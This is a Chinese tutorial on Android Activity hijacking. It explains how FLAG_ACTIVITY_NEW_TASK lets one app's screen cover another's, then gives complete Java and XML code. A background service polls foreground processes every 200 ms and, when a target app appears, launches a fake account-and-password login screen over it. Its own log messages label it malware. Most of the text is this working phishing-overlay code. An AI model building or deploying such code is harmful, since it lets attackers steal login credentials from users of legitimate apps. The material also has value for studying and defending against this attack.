Android-Activity劫持

Android-Acitivity劫持

由于Android的设计缺陷，当我们为Activity指定标志位FLAG_ ACTIVITY_ NEW_ TASK时，就能使Activity置于栈顶，并呈现给用户。

1.通过遍历所有的进程，得到当前前台正在运行的应用进程

2.判断是否是目标进程，如果是启动伪造的Activity，对用户信息进行劫持。

hackService用于执行劫持主要逻辑

public class HackService extends Service {
//targetMap用于存放我们的目标程序
HashMap<String, Class<?>> targetMap = new HashMap<String, Class<?>>();
Handler handler = new Handler();
boolean isStart = false;

//我们新建一个Runnable对象，每隔200ms进行一次搜索
Runnable searchTarget = new Runnable() {
@Override
public void run() {
//得到ActivityManager
ActivityManager activityManager = (ActivityManager) getSystemService(Context.ACTIVITY_SERVICE);
//通过ActivityManager将当前正在运行的进程存入processInfo中
List<ActivityManager.RunningAppProcessInfo> processInfo = activityManager.getRunningAppProcesses();
Log.w("恶意软件", "遍历进程");
//遍历processInfo中的进程信息，看是否有我们的目标
for (ActivityManager.RunningAppProcessInfo _processInfo : processInfo) {
//若processInfo中的进程正在前台且是我们的目标进程，则调用hijack方法进行劫持
if (_processInfo.importance == ActivityManager.RunningAppProcessInfo.IMPORTANCE_FOREGROUND) {
if (targetMap.containsKey(_processInfo.processName)) {
// 调用hijack方法进行劫持
hijack(_processInfo.processName);
} else {
Log.w("进程", _processInfo.processName);
}
}
}
handler.postDelayed(searchTarget, 200);
}
};

//进行Activity劫持的函数
private void hijack(String processName) {
//这里判断我们的目标程序是否已经被劫持过了
if (((hackApplication) getApplication())
.hasProgressBeHijacked(processName) == false) {
Log.w("恶意软件", "开始劫持"+processName);
Intent intent = new Intent(getBaseContext(),
targetMap.get(processName));
//这里必须将flag设置为Intent.FLAG_ACTIVITY_NEW_TASK，这样才能将我们伪造的Activity至于栈顶
intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
//启动我们伪造的Activity
getApplication().startActivity(intent);
//将目标程序加入到已劫持列表中
((hackApplication) getApplication()).addHijacked(processName);
Log.w("恶意软件", "已经劫持");
}
}
@Override
public void onStart(Intent intent, int startId) {
super.onStart(intent, startId);
if (!isStart) {
//将我们的目标加入targetMap中
//这里，key为我们的目标进程，value为我们伪造的Activity
targetMap.put("com.example.mrsj.activity",
MainActivity.class);
//启动searchTarget
handler.postDelayed(searchTarget, 1000);
isStart = true;
}
}

@Override
public boolean stopService(Intent name) {
isStart = false;
Log.w("恶意软件", "停止劫持");
//清空劫持列表
((hackApplication) getApplication()).clearHijacked();
//停止searchTarget
handler.removeCallbacks(searchTarget);
return super.stopService(name);
}

@Override
public IBinder onBind(Intent intent) {
return null;
}
}

hackApplication实现自己的application，并且要在manifest文件中声明application的android:name=”.hackApplication”

public class hackApplication extends Application {
List<String> hijackedList = new ArrayList<String>();

public boolean hasProgressBeHijacked(String processName) {
//return hijackedList.contains(processName);
return false;
}

public void addHijacked(String processName) {
hijackedList.add(processName);
}

public void clearHijacked() {
hijackedList.clear();
}

}

在MainActivity 中实现伪造Activity的呈现效果

public class MainActivity extends AppCompatActivity {

@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
final EditText user=(EditText)findViewById(R.id.user);
final  EditText pass=(EditText)findViewById(R.id.pass);
final  Button login=(Button)findViewById(R.id.login);

Timer timer=new Timer();
TimerTask task=new TimerTask() {

@Override
public void run() {
runOnUiThread(new Runnable() {
@Override
public void run() {
user.setVisibility(View.VISIBLE);
pass.setVisibility(View.VISIBLE);
login.setVisibility(View.VISIBLE);
}
});
}
};
timer.schedule(task,1000);
login.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
user.setVisibility(View.INVISIBLE);
pass.setVisibility(View.INVISIBLE);
login.setVisibility(View.INVISIBLE);
finish();
}
});
}
}

布局文件activity_main

<?xml version="1.0" encoding="utf-8"?>
<RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android"
xmlns:tools="http://schemas.android.com/tools"
android:layout_width="match_parent"
android:layout_height="match_parent"
android:paddingBottom="@dimen/activity_vertical_margin"
android:paddingLeft="@dimen/activity_horizontal_margin"
android:paddingRight="@dimen/activity_horizontal_margin"
android:paddingTop="@dimen/activity_vertical_margin"
>
<LinearLayout
android:id="@+id/linear"
android:orientation="vertical"
android:layout_width="match_parent"
android:layout_height="wrap_content">
<LinearLayout
android:orientation="horizontal"
android:layout_width="match_parent"
android:layout_height="wrap_content">
<TextView
android:textSize="18sp"
android:text="账号："
android:layout_width="wrap_content"
android:layout_height="wrap_content" />
<EditText
android:visibility="invisible"
android:id="@+id/user"
android:hint="账号"
android:layout_width="match_parent"
android:layout_height="wrap_content" />
</LinearLayout>

<LinearLayout
android:orientation="horizontal"
android:layout_width="match_parent"
android:layout_height="wrap_content">
<TextView
android:textSize="18sp"
android:text="密码："
android:layout_width="wrap_content"
android:layout_height="wrap_content" />
<EditText
android:visibility="invisible"
android:id="@+id/pass"
android:hint="密码"
android:layout_width="match_parent"
android:layout_height="wrap_content" />
</LinearLayout>
</LinearLayout>
<Button
android:visibility="invisible"
android:id="@+id/login"
android:layout_below="@id/linear"
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:text="登录" />
</RelativeLayout>